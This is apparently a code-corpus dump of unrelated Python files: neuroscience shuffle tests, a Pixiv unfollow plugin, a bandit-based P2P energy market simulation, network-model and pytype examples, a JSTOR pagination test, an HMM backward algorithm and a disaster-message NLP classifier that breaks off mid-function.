real_percentile_pos = percentileofscore(pearson_r_pos, pearson_r_pos_real)
return real_percentile_neg, real_percentile_pos, shuffled_binned_data
def ahv_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
):
pearson_r_neg = []
pearson_r_pos = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
(r_neg, r_pos), shuffled_binned_data = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
pos_neg_separate=True,
)
pearson_r_neg.append(r_neg)
pearson_r_pos.append(r_pos)
pearson_r_neg = np.array(pearson_r_neg)
pearson_r_pos = np.array(pearson_r_pos)
output.put([pearson_r_neg, pearson_r_pos])
def is_velocity_cell_sig(
pearson_real,
bin_centers,
spike_train,
velocity_vals_timecourse,
bin_times_in_range,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
parallel=False,
correlation_mag_force=False,
):
shuffled_binned_data = []
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
velocity_vals_timecourse,
bin_times_in_range,
)
pearson = generic_parallel_shuffle_test(
velocity_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
)
else: # if parallel doesn't work
logging.warning("Not running serial shuffling")
pearson = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
pearson[iteration],
_shuffled_binned_data,
) = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
velocity_vals_timecourse,
bin_times_in_range,
sanitise_values=True,
)
shuffled_binned_data.append(_shuffled_binned_data)
if correlation_mag_force:
pearson = abs(pearson)
pearson_real = abs(pearson_real)
real_percentile_val = percentileofscore(pearson, pearson_real)
return real_percentile_val, shuffled_binned_data
def velocity_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
vals_timecourse,
bin_times_in_range,
):
pearson = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
r, shuffled_binned_data = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
vals_timecourse,
bin_times_in_range,
sanitise_values=True,
)
pearson.append(r)
pearson = np.array(pearson)
output.put(pearson)
def is_place_cell_sig(
real_peak,
bin_centers,
spike_train,
x,
y,
bin_occupancy,
smoothing=None,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
sanitise_values=True,
min_time_in_spatial_bin=0,
parallel=False,
):
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
bin_centers_x, bin_centers_y = bin_centers
bin_size = bin_centers_x[1] - bin_centers_x[0]
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
bin_size,
x,
y,
bin_occupancy,
smoothing,
sanitise_values,
min_time_in_spatial_bin,
)
peaks = generic_parallel_shuffle_test(
place_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
)
else: # if parallel doesn't work
logging.warning("Not running parallel shuffling")
peaks = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
peaks[iteration] = spike_tools.place_peak_response(
spikes_shuffled,
bin_centers,
bin_size,
x,
y,
sanitise_values=sanitise_values,
min_time_in_spatial_bin=min_time_in_spatial_bin,
smoothing=smoothing,
bin_occupancy=bin_occupancy,
)
real_percentile_val = percentileofscore(peaks, real_peak)
return real_percentile_val
def place_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
bin_size,
x,
y,
bin_occupancy,
smoothing,
sanitise_values,
min_time_in_spatial_bin,
):
peaks = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
peak = spike_tools.place_peak_response(
spikes_shuffled,
bin_centers,
bin_size,
x,
y,
sanitise_values=sanitise_values,
min_time_in_spatial_bin=min_time_in_spatial_bin,
smoothing=smoothing,
bin_occupancy=bin_occupancy,
)
peaks.append(peak)
peaks = np.array(peaks)
output.put(peaks) | en | 0.745765 | # Define an output queue # add output to args # array of shuffle magnitudes to go through # split up the shuffle magnitudes into blocks for each process # Setup a list of processes # Run processes # Exit the completed processes # Get process results from the output queue # Get process results from the output queue :param vec_length_real: "Real" (i.e. unshuffled) mean vector length :param head_angles_all: Head angle at bin (wrapped) :param spike_train: Number of spikes per bin :param head_angle_sampling: Relative occupancy of bins :param camera_frames_per_sec: Calibration :param bin_spacing: In radians :param num_iterations: How many shuffling iterations (default: 1000) :param threshold: Number of spikes per bin for it to be classed as active (default: 1) :param bool parallel: If true, split up the shuffle iterations across multiple CPU cores. :param int num_processes: If 'parallel', how many processes to use. Default: 10 :return: # todo: combine with opendirection.spikes.tools.get_direction_per_spike # if parallel doesn't work # if only care about magnitude of correlation # if parallel doesn't work # if parallel doesn't work | 2.469406 | 2 |
app/plugin/biu/do/unfollow.py | 2chips/PixivBiu | 1 | 6632489 | <reponame>2chips/PixivBiu<gh_stars>1-10
# coding=utf-8
# pylint: disable=relative-beyond-top-level
from ....platform import CMDProcessor
@CMDProcessor.plugin_register("api/biu/do/unfollow")
class doUnFollow(object):
def __init__(self, MOD):
self.MOD = MOD
def pRun(self, cmd):
if self.MOD.biu.apiType != "public":
return {"code": 0, "msg": "only support public api"}
try:
args = self.MOD.args.getArgs(
"unfollow",
[
"userID",
(
"restrict=%s"
% self.MOD.biu.sets["biu"]["common"]["defaultActionType"]
),
],
)
except:
return {"code": 0, "msg": "missing parameters"}
return {
"code": 1,
"msg": {
"way": "do",
"args": args,
"rst": self.unFollow(args["ops"].copy(), args["fun"].copy()),
},
}
def unFollow(self, opsArg, funArg):
self.MOD.args.argsPurer(
funArg, {"userID": "user_ids", "restrict": "publicity"}
)
r = self.MOD.biu.api.me_favorite_users_unfollow(**funArg)
return {"api": "public", "data": r}
| # coding=utf-8
# pylint: disable=relative-beyond-top-level
from ....platform import CMDProcessor
@CMDProcessor.plugin_register("api/biu/do/unfollow")
class doUnFollow(object):
def __init__(self, MOD):
self.MOD = MOD
def pRun(self, cmd):
if self.MOD.biu.apiType != "public":
return {"code": 0, "msg": "only support public api"}
try:
args = self.MOD.args.getArgs(
"unfollow",
[
"userID",
(
"restrict=%s"
% self.MOD.biu.sets["biu"]["common"]["defaultActionType"]
),
],
)
except:
return {"code": 0, "msg": "missing parameters"}
return {
"code": 1,
"msg": {
"way": "do",
"args": args,
"rst": self.unFollow(args["ops"].copy(), args["fun"].copy()),
},
}
def unFollow(self, opsArg, funArg):
self.MOD.args.argsPurer(
funArg, {"userID": "user_ids", "restrict": "publicity"}
)
r = self.MOD.biu.api.me_favorite_users_unfollow(**funArg)
return {"api": "public", "data": r} | en | 0.663243 | # coding=utf-8 # pylint: disable=relative-beyond-top-level | 2.149899 | 2 |
P2P_simulation.py | tabsa/P2P_market_MAD | 0 | 6632490 | <filename>P2P_simulation.py
## RL agent for the Energy P2P market as Multi-Armed Bandit (MAD) problem
# Application of MAD problem to the energy P2P market
# TBA
#%% Import packages
import numpy as np
import pandas as pd
import pickle as pkl
import os
# Import Class and functions
from MAD_env import trading_env, trading_agent
from plot_class import *
#%% Hyperparameters for the validation
## Path of the file with the training loop
wk_dir = os.getcwd() + '/results/' # Get from the 'results/' folder
train_file = 'sim_results_fixed_target_15.pkl' # Replace by other if you want
train_file = os.path.join(wk_dir, train_file)
out_filename = 'sim_results_fixed_target_15_Validation.pkl'
out_filename = os.path.join(wk_dir, out_filename)
#no_steps = policy.shape[1] # per episode
no_steps = 40 # It can be the same or not from the training loop...up to the user
no_episodes = 100 # Episodes for validation
training_epi = np.arange(90, 100) # episodes id to get the final optimal policy from the training loop
# Different types of energy_target scenarios:
target_bounds = np.array([5, 35]) # Random (and independent) between episodes
target_sample = np.random.uniform(low=target_bounds[0], high=target_bounds[1], size=no_episodes)
#target_bounds = np.arange(start=5, stop=51, step=5) # Progressive e_target = [5, 50]
#target_sample = np.repeat(target_bounds, 20)
## Output data
agent_list = [] # List with all RL agent
outcome_agent = [] # List of outcome DF per RL agent
# Name of the elements for the outcome_agent DF
df_col_name = ['mean_rd', 'final_step', 'energy_target', 'final_state',
'avg_Q_val', 'std_Q_val', 'mean_regret', 'avg_reg_val', 'std_reg_val']
policy_agent = [] # List of policy solutions (array) per RL agent
policy_distribution = [] # List of estimator Q_val(arm_j) per RL agent
#######################################################################################################################
#%% Main Script
if __name__ == '__main__':
## Load the file with the training loop
data = pkl.load(open(train_file, 'rb')) # Read file
env = data['simulation']['environment'] # Load the same env
env.reset() # Important to Reset before using it again
env.sample_seed = target_sample # Replace the energy target for the Validation phase
## Upload the parameters used on the training loop
no_RL_agents = data['agents']['no'] # Same no and Policy per agent
no_offers = env.no_offers
policy_name = data['agents']['id'] # Upload the same Policies from the training loop
optimal_policy = data['policy_dist'] # Optimal policy per agent, it is on a List
policy_sol_epi = np.zeros((6, no_steps, no_episodes)) # Array to store policy solutions per episode
policy_estimate_dist = np.zeros((no_episodes, no_offers, 3)) # 3 values stored per epi and offer, that is why we have a 3rd dimension
for ag in range(no_RL_agents):
agent = trading_agent(env, target_bounds, policy_name[ag], e_greedy=1) # Call the trading_agent class
print(f'Run the agent {agent.policy_opt} with fixed Q-value(j):') # Print which RL_agent by its policy_opt
e = 0 # episode id
while True:
# Set the optimal policy
agent.Arm_Q_j = optimal_policy[ag][training_epi, :, 0].mean(axis=0) # Q-value of each arm_j
agent.N_arm = optimal_policy[ag][training_epi, :, 1].mean(axis=0) # No of times each arm_j was selected
agent.thom_var = optimal_policy[ag][training_epi, :, 2].mean(axis=0) # Only for Thompson-Sampler (Variance of the Beta Dist)
print(f'Episode {e} - Energy target {target_sample[e]}') # Episode print
env.run(agent, e) # Run environment, as inputs - RL_agent and epi_id
# Store final results in np.arrays
policy_sol_epi[:, :, e] = agent.policy_sol
policy_estimate_dist[e, :, :] = agent.Q_val_final
# Go to the next episode
if e < no_episodes-1: # stopping condition
e += 1
# Reset of both agent and environment
agent.reset()
else: # Stop the loop
break
# end episodes for agent ag
# Store the outcome parameters:
outcome_agent.append(pd.DataFrame(agent.outcome, columns=df_col_name))
policy_agent.append(policy_sol_epi)
policy_distribution.append(policy_estimate_dist)
# Reset the array for next agent in agent_list:
policy_sol_epi = np.zeros((6, no_steps, no_episodes))
policy_estimate_dist = np.zeros((no_episodes, no_offers, 3))
print('\n')
print(f'Validation phase is done')
## Save simulation results
# Build a dictionary
validation = {} # Results from the validation phase, including the Estimator computed from the Training loop
# Validation info
validation['episodes'] = training_epi
validation['Arm_Q_j'] = [optimal_policy[i][training_epi, :, 0].mean(axis=0) for i in range(3)]
validation['N_arm'] = [optimal_policy[i][training_epi, :, 1].mean(axis=0) for i in range(3)]
validation['Thom_var'] = [optimal_policy[i][training_epi, :, 2].mean(axis=0) for i in range(3)]
validation['episodes'] = no_episodes
validation['steps'] = no_steps
data['validation'] = validation # Assign the new 'validation' field to the data.dictionary
# Update previous fields of the data dictionary
data['simulation']['target'] = target_sample # Energy_target used for the validation
data['outcome'] = outcome_agent
data['policy_sol'] = policy_agent # Optimal policy per agent and episode
data['policy_dist'] = policy_distribution # Distribution of Q_val per arm_j (partner)
file = open(out_filename, 'wb')
pkl.dump(data, file)
file.close()
| <filename>P2P_simulation.py
## RL agent for the Energy P2P market as Multi-Armed Bandit (MAD) problem
# Application of MAD problem to the energy P2P market
# TBA
#%% Import packages
import numpy as np
import pandas as pd
import pickle as pkl
import os
# Import Class and functions
from MAD_env import trading_env, trading_agent
from plot_class import *
#%% Hyperparameters for the validation
## Path of the file with the training loop
wk_dir = os.getcwd() + '/results/' # Get from the 'results/' folder
train_file = 'sim_results_fixed_target_15.pkl' # Replace by other if you want
train_file = os.path.join(wk_dir, train_file)
out_filename = 'sim_results_fixed_target_15_Validation.pkl'
out_filename = os.path.join(wk_dir, out_filename)
#no_steps = policy.shape[1] # per episode
no_steps = 40 # It can be the same or not from the training loop...up to the user
no_episodes = 100 # Episodes for validation
training_epi = np.arange(90, 100) # episodes id to get the final optimal policy from the training loop
# Different types of energy_target scenarios:
target_bounds = np.array([5, 35]) # Random (and independent) between episodes
target_sample = np.random.uniform(low=target_bounds[0], high=target_bounds[1], size=no_episodes)
#target_bounds = np.arange(start=5, stop=51, step=5) # Progressive e_target = [5, 50]
#target_sample = np.repeat(target_bounds, 20)
## Output data
agent_list = [] # List with all RL agent
outcome_agent = [] # List of outcome DF per RL agent
# Name of the elements for the outcome_agent DF
df_col_name = ['mean_rd', 'final_step', 'energy_target', 'final_state',
'avg_Q_val', 'std_Q_val', 'mean_regret', 'avg_reg_val', 'std_reg_val']
policy_agent = [] # List of policy solutions (array) per RL agent
policy_distribution = [] # List of estimator Q_val(arm_j) per RL agent
#######################################################################################################################
#%% Main Script
if __name__ == '__main__':
## Load the file with the training loop
data = pkl.load(open(train_file, 'rb')) # Read file
env = data['simulation']['environment'] # Load the same env
env.reset() # Important to Reset before using it again
env.sample_seed = target_sample # Replace the energy target for the Validation phase
## Upload the parameters used on the training loop
no_RL_agents = data['agents']['no'] # Same no and Policy per agent
no_offers = env.no_offers
policy_name = data['agents']['id'] # Upload the same Policies from the training loop
optimal_policy = data['policy_dist'] # Optimal policy per agent, it is on a List
policy_sol_epi = np.zeros((6, no_steps, no_episodes)) # Array to store policy solutions per episode
policy_estimate_dist = np.zeros((no_episodes, no_offers, 3)) # 3 values stored per epi and offer, that is why we have a 3rd dimension
for ag in range(no_RL_agents):
agent = trading_agent(env, target_bounds, policy_name[ag], e_greedy=1) # Call the trading_agent class
print(f'Run the agent {agent.policy_opt} with fixed Q-value(j):') # Print which RL_agent by its policy_opt
e = 0 # episode id
while True:
# Set the optimal policy
agent.Arm_Q_j = optimal_policy[ag][training_epi, :, 0].mean(axis=0) # Q-value of each arm_j
agent.N_arm = optimal_policy[ag][training_epi, :, 1].mean(axis=0) # No of times each arm_j was selected
agent.thom_var = optimal_policy[ag][training_epi, :, 2].mean(axis=0) # Only for Thompson-Sampler (Variance of the Beta Dist)
print(f'Episode {e} - Energy target {target_sample[e]}') # Episode print
env.run(agent, e) # Run environment, as inputs - RL_agent and epi_id
# Store final results in np.arrays
policy_sol_epi[:, :, e] = agent.policy_sol
policy_estimate_dist[e, :, :] = agent.Q_val_final
# Go to the next episode
if e < no_episodes-1: # stopping condition
e += 1
# Reset of both agent and environment
agent.reset()
else: # Stop the loop
break
# end episodes for agent ag
# Store the outcome parameters:
outcome_agent.append(pd.DataFrame(agent.outcome, columns=df_col_name))
policy_agent.append(policy_sol_epi)
policy_distribution.append(policy_estimate_dist)
# Reset the array for next agent in agent_list:
policy_sol_epi = np.zeros((6, no_steps, no_episodes))
policy_estimate_dist = np.zeros((no_episodes, no_offers, 3))
print('\n')
print(f'Validation phase is done')
## Save simulation results
# Build a dictionary
validation = {} # Results from the validation phase, including the Estimator computed from the Training loop
# Validation info
validation['episodes'] = training_epi
validation['Arm_Q_j'] = [optimal_policy[i][training_epi, :, 0].mean(axis=0) for i in range(3)]
validation['N_arm'] = [optimal_policy[i][training_epi, :, 1].mean(axis=0) for i in range(3)]
validation['Thom_var'] = [optimal_policy[i][training_epi, :, 2].mean(axis=0) for i in range(3)]
validation['episodes'] = no_episodes
validation['steps'] = no_steps
data['validation'] = validation # Assign the new 'validation' field to the data.dictionary
# Update previous fields of the data dictionary
data['simulation']['target'] = target_sample # Energy_target used for the validation
data['outcome'] = outcome_agent
data['policy_sol'] = policy_agent # Optimal policy per agent and episode
data['policy_dist'] = policy_distribution # Distribution of Q_val per arm_j (partner)
file = open(out_filename, 'wb')
pkl.dump(data, file)
file.close()
| en | 0.767428 | ## RL agent for the Energy P2P market as Multi-Armed Bandit (MAD) problem # Application of MAD problem to the energy P2P market # TBA #%% Import packages # Import Class and functions #%% Hyperparameters for the validation ## Path of the file with the training loop # Get from the 'results/' folder # Replace by other if you want #no_steps = policy.shape[1] # per episode # It can be the same or not from the training loop...up to the user # Episodes for validation # episodes id to get the final optimal policy from the training loop # Different types of energy_target scenarios: # Random (and independent) between episodes #target_bounds = np.arange(start=5, stop=51, step=5) # Progressive e_target = [5, 50] #target_sample = np.repeat(target_bounds, 20) ## Output data # List with all RL agent # List of outcome DF per RL agent # Name of the elements for the outcome_agent DF # List of policy solutions (array) per RL agent # List of estimator Q_val(arm_j) per RL agent ####################################################################################################################### #%% Main Script ## Load the file with the training loop # Read file # Load the same env # Important to Reset before using it again # Replace the energy target for the Validation phase ## Upload the parameters used on the training loop # Same no and Policy per agent # Upload the same Policies from the training loop # Optimal policy per agent, it is on a List # Array to store policy solutions per episode # 3 values stored per epi and offer, that is why we have a 3rd dimension # Call the trading_agent class # Print which RL_agent by its policy_opt # episode id # Set the optimal policy # Q-value of each arm_j # No of times each arm_j was selected # Only for Thompson-Sampler (Variance of the Beta Dist) # Episode print # Run environment, as inputs - RL_agent and epi_id # Store final results in np.arrays # Go to the next episode # stopping condition # Reset of both agent and environment # Stop the loop # end episodes for agent ag # Store the outcome parameters: # Reset the array for next agent in agent_list: ## Save simulation results # Build a dictionary # Results from the validation phase, including the Estimator computed from the Training loop # Validation info # Assign the new 'validation' field to the data.dictionary # Update previous fields of the data dictionary # Energy_target used for the validation # Optimal policy per agent and episode # Distribution of Q_val per arm_j (partner) | 2.592681 | 3 |
examples/lsp_manual_metric_perf_model_prototype.py | tim-fiola/network_traffic_modeler_py3 | 102 | 6632491 | <reponame>tim-fiola/network_traffic_modeler_py3
import sys
sys.path.append("../")
from pprint import pprint
from pyNTM import PerformanceModel
from pyNTM import RSVP_LSP
model = PerformanceModel.load_model_file("perf_model_lsp_metric.csv")
model.update_simulation()
lsp_a_d_1 = model.get_rsvp_lsp("A", "D", "lsp_a_d_1")
lsp_a_d_2 = model.get_rsvp_lsp("A", "D", "lsp_a_d_2")
print("lsp_a_d_2 config_setup_bw = {}".format(lsp_a_d_2.configured_setup_bandwidth))
print("lsp_a_d_2 setup_bw = {}".format(lsp_a_d_2.setup_bandwidth))
print("lsp_a_d_2 manual_metric = {}".format(lsp_a_d_2.manual_metric))
print("lsp_a_d_2 path = ")
pprint(lsp_a_d_2.path)
print()
print("lsp_a_d_1 setup_bw = {}".format(lsp_a_d_1.configured_setup_bandwidth))
print("lsp_a_d_1 manual_metric = {}".format(lsp_a_d_1.manual_metric))
print("lsp_a_d_1 effective_metric = {}".format(lsp_a_d_1.effective_metric(model)))
print("lsp_a_d_1 topology_metric = {}".format(lsp_a_d_1.topology_metric(model)))
new_lsp = RSVP_LSP(
model.get_node_object("A"),
model.get_node_object("G"),
"lsp_a_f_manual_enter",
configured_setup_bandwidth=float("4"),
configured_manual_metric=float("10"),
)
| import sys
sys.path.append("../")
from pprint import pprint
from pyNTM import PerformanceModel
from pyNTM import RSVP_LSP
model = PerformanceModel.load_model_file("perf_model_lsp_metric.csv")
model.update_simulation()
lsp_a_d_1 = model.get_rsvp_lsp("A", "D", "lsp_a_d_1")
lsp_a_d_2 = model.get_rsvp_lsp("A", "D", "lsp_a_d_2")
print("lsp_a_d_2 config_setup_bw = {}".format(lsp_a_d_2.configured_setup_bandwidth))
print("lsp_a_d_2 setup_bw = {}".format(lsp_a_d_2.setup_bandwidth))
print("lsp_a_d_2 manual_metric = {}".format(lsp_a_d_2.manual_metric))
print("lsp_a_d_2 path = ")
pprint(lsp_a_d_2.path)
print()
print("lsp_a_d_1 setup_bw = {}".format(lsp_a_d_1.configured_setup_bandwidth))
print("lsp_a_d_1 manual_metric = {}".format(lsp_a_d_1.manual_metric))
print("lsp_a_d_1 effective_metric = {}".format(lsp_a_d_1.effective_metric(model)))
print("lsp_a_d_1 topology_metric = {}".format(lsp_a_d_1.topology_metric(model)))
new_lsp = RSVP_LSP(
model.get_node_object("A"),
model.get_node_object("G"),
"lsp_a_f_manual_enter",
configured_setup_bandwidth=float("4"),
configured_manual_metric=float("10"),
) | none | 1 | 2.210426 | 2 |
|
pytype/tools/xref/testdata/classdef_in_function.py | Jrryy/pytype | 3,882 | 6632492 | <reponame>Jrryy/pytype
# pylint: skip-file
def f():
#- @A defines/binding ClassA
#- ClassA.node/kind class
class A:
pass
def g():
#- @B defines/binding ClassB
#- ClassB.node/kind class
class B:
pass
return B
def h(base):
#- @C defines/binding ClassC
#- ClassC.node/kind class
class C(base):
pass
#- @D defines/binding ClassD
#- ClassD.node/kind class
class D(C):
pass
return D()
| # pylint: skip-file
def f():
#- @A defines/binding ClassA
#- ClassA.node/kind class
class A:
pass
def g():
#- @B defines/binding ClassB
#- ClassB.node/kind class
class B:
pass
return B
def h(base):
#- @C defines/binding ClassC
#- ClassC.node/kind class
class C(base):
pass
#- @D defines/binding ClassD
#- ClassD.node/kind class
class D(C):
pass
return D() | en | 0.145511 | # pylint: skip-file #- @A defines/binding ClassA #- ClassA.node/kind class #- @B defines/binding ClassB #- ClassB.node/kind class #- @C defines/binding ClassC #- ClassC.node/kind class #- @D defines/binding ClassD #- ClassD.node/kind class | 2.295242 | 2 |
osp/test/citations/jstor_record/test_pagination.py | davidmcclure/open-syllabus-project | 220 | 6632493 |
import pytest
from osp.citations.jstor_record import JSTOR_Record
@pytest.mark.parametrize('fpage,lpage,pagination', [
# Both.
(100, 200, '100-200'),
# Just fpage.
(100, '', '100'),
# Just lpage.
('', 200, '200'),
# Neither.
('', '', None),
])
def test_pagination(fpage, lpage, pagination, mock_jstor):
path = mock_jstor.add_article(fpage=fpage, lpage=lpage)
assert JSTOR_Record(path).pagination == pagination
|
import pytest
from osp.citations.jstor_record import JSTOR_Record
@pytest.mark.parametrize('fpage,lpage,pagination', [
# Both.
(100, 200, '100-200'),
# Just fpage.
(100, '', '100'),
# Just lpage.
('', 200, '200'),
# Neither.
('', '', None),
])
def test_pagination(fpage, lpage, pagination, mock_jstor):
path = mock_jstor.add_article(fpage=fpage, lpage=lpage)
assert JSTOR_Record(path).pagination == pagination
| en | 0.690724 | # Both. # Just fpage. # Just lpage. # Neither. | 2.320287 | 2 |
bio-info/bioinfo_7.py | kyamada101/Python | 0 | 6632494 | <reponame>kyamada101/Python
import numpy as np
import math
from scipy.special import logsumexp
log05 = np.log(0.5)
x_str = "315116246446644245311321631164152133625144543631656626566666651166453132651245636664631636663162326455236266666625151631222555441666566563564324364131513465146353411126414626253356366163666466232534413661661163252562462255265252266435353336233121625364414432335163243633665562466662632666612355245242"
x = np.array(list(x_str),dtype = np.float32)
#lが状態番号、bがx
def e(l,b):
if l == 0.0:
return 1/6
elif l == 1.0 and b == 6.0:
return 1/2
elif l == 1.0 and b != 6.0:
return 1/10
#kとlは状態番号
def a(k,l):
if k == 0.0 and l == 0.0:
return 0.95
elif k == 0.0 and l == 1.0:
return 0.05
elif k == 1.0 and l == 0.0:
return 0.1
elif k == 1.0 and l == 1.0:
return 0.9
#lは状態番号、bはx
def le(l,b):
if l == 0.0:
return np.log(1/6)
elif l == 1.0 and b == 6.0:
return np.log(1/2)
elif l == 1.0 and b != 6.0:
return np.log(1/10)
#kとlは状態番号
def la(k,l):
if k == 0.0 and l == 0.0:
return np.log(0.95)
elif k == 0.0 and l == 1.0:
return np.log(0.05)
elif k == 1.0 and l == 0.0:
return np.log(0.1)
elif l == 1.0 and l == 1.0:
return np.log(0.9)
def Back_Log(x):
x = np.insert(x,0,0)
n = x.shape[0]
b = np.zeros([2,n])
b[0,n-1] = np.log(1)
b[1,n-1] = np.log(1)
for i in range(1,n-1):
j = (n-1)-i
for k in range(0,2):
b[k,j] = logsumexp([la(k,0) + le(0,x[j+1]) + b[0,j+1], la(k,1) + le(1,x[j+1]) + b[1,j+1]])
lp = logsumexp([log05 + le(0,x[1]) + b[0,1], log05 + le(1,x[1]) + b[1,1]])
return np.exp(lp)
def Back_Scale(x):
x = np.insert(x,0,0)
n = x.shape[0]
b = np.zeros([2,n])
s = np.zeros(n)
b[0,n-1] = 1
b[1,n-1] = 1
for i in range(1,n):
j = (n-1)-i
if j == 0:
s[j+1] = 0.5*e(0,x[j+1])*b[0,j+1] + 0.5*e(1,x[j+1])*b[1,j+1]
else:
s[j+1] = (a(0,0)+a(1,0))*e(0,x[j+1])*b[0,j+1] + (a(0,1)+a(1,1))*e(1,x[j+1])*b[1,j+1]
for k in range(0,2):
b[k,j] = (1/s[j+1]) * (a(k,0)*e(0,x[j+1])*b[0,j+1] + a(k,1) * e(1,x[j+1])*b[1,j+1])
return np.prod(s[1:])
print("Back_Log_result:{}".format(Back_Log(x)))
print("Back_Scale_result:{}".format(Back_Scale(x))) | import numpy as np
import math
from scipy.special import logsumexp
log05 = np.log(0.5)
x_str = "315116246446644245311321631164152133625144543631656626566666651166453132651245636664631636663162326455236266666625151631222555441666566563564324364131513465146353411126414626253356366163666466232534413661661163252562462255265252266435353336233121625364414432335163243633665562466662632666612355245242"
x = np.array(list(x_str),dtype = np.float32)
#lが状態番号、bがx
def e(l,b):
if l == 0.0:
return 1/6
elif l == 1.0 and b == 6.0:
return 1/2
elif l == 1.0 and b != 6.0:
return 1/10
#kとlは状態番号
def a(k,l):
if k == 0.0 and l == 0.0:
return 0.95
elif k == 0.0 and l == 1.0:
return 0.05
elif k == 1.0 and l == 0.0:
return 0.1
elif k == 1.0 and l == 1.0:
return 0.9
#lは状態番号、bはx
def le(l,b):
if l == 0.0:
return np.log(1/6)
elif l == 1.0 and b == 6.0:
return np.log(1/2)
elif l == 1.0 and b != 6.0:
return np.log(1/10)
#kとlは状態番号
def la(k,l):
if k == 0.0 and l == 0.0:
return np.log(0.95)
elif k == 0.0 and l == 1.0:
return np.log(0.05)
elif k == 1.0 and l == 0.0:
return np.log(0.1)
elif l == 1.0 and l == 1.0:
return np.log(0.9)
def Back_Log(x):
x = np.insert(x,0,0)
n = x.shape[0]
b = np.zeros([2,n])
b[0,n-1] = np.log(1)
b[1,n-1] = np.log(1)
for i in range(1,n-1):
j = (n-1)-i
for k in range(0,2):
b[k,j] = logsumexp([la(k,0) + le(0,x[j+1]) + b[0,j+1], la(k,1) + le(1,x[j+1]) + b[1,j+1]])
lp = logsumexp([log05 + le(0,x[1]) + b[0,1], log05 + le(1,x[1]) + b[1,1]])
return np.exp(lp)
def Back_Scale(x):
x = np.insert(x,0,0)
n = x.shape[0]
b = np.zeros([2,n])
s = np.zeros(n)
b[0,n-1] = 1
b[1,n-1] = 1
for i in range(1,n):
j = (n-1)-i
if j == 0:
s[j+1] = 0.5*e(0,x[j+1])*b[0,j+1] + 0.5*e(1,x[j+1])*b[1,j+1]
else:
s[j+1] = (a(0,0)+a(1,0))*e(0,x[j+1])*b[0,j+1] + (a(0,1)+a(1,1))*e(1,x[j+1])*b[1,j+1]
for k in range(0,2):
b[k,j] = (1/s[j+1]) * (a(k,0)*e(0,x[j+1])*b[0,j+1] + a(k,1) * e(1,x[j+1])*b[1,j+1])
return np.prod(s[1:])
print("Back_Log_result:{}".format(Back_Log(x)))
print("Back_Scale_result:{}".format(Back_Scale(x))) | ja | 0.993823 | #lが状態番号、bがx #kとlは状態番号 #lは状態番号、bはx #kとlは状態番号 | 3.044878 | 3 |
models/train_classifier.py | explorer70/DisasterRecoveryNLP | 0 | 6632495 | import sys
import pandas as pd
import pickle
from sqlalchemy import create_engine
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.metrics import confusion_matrix
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.multioutput import MultiOutputClassifier
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import GridSearchCV
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import classification_report
nltk.download('punkt')
nltk.download('stopwords')
nltk.download('wordnet')
nltk.download('averaged_perceptron_tagger')
def load_data(database_filepath):
'''The functions loads data from sqlite database providd the path
It returns the features X, labels Y and the label names.'''
engine = create_engine('sqlite:///'+database_filepath)
df = pd.read_sql("select * from Messages", engine)
print ('Loaded: ', df.shape)
# drop data with no categories assigned
df = df[df['cat_num']>0]
X = df['message']
Y = df.iloc[:, 4:-1]
return X, Y, Y.columns
def tokenize(text):
'''The function will remove punctuation, normalize the text case, lemmatize and remove the stop words'''
stop_words = stopwords.words("english")
lemmatizer = WordNetLemmatizer()
# normalize case and remove punctuation
text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
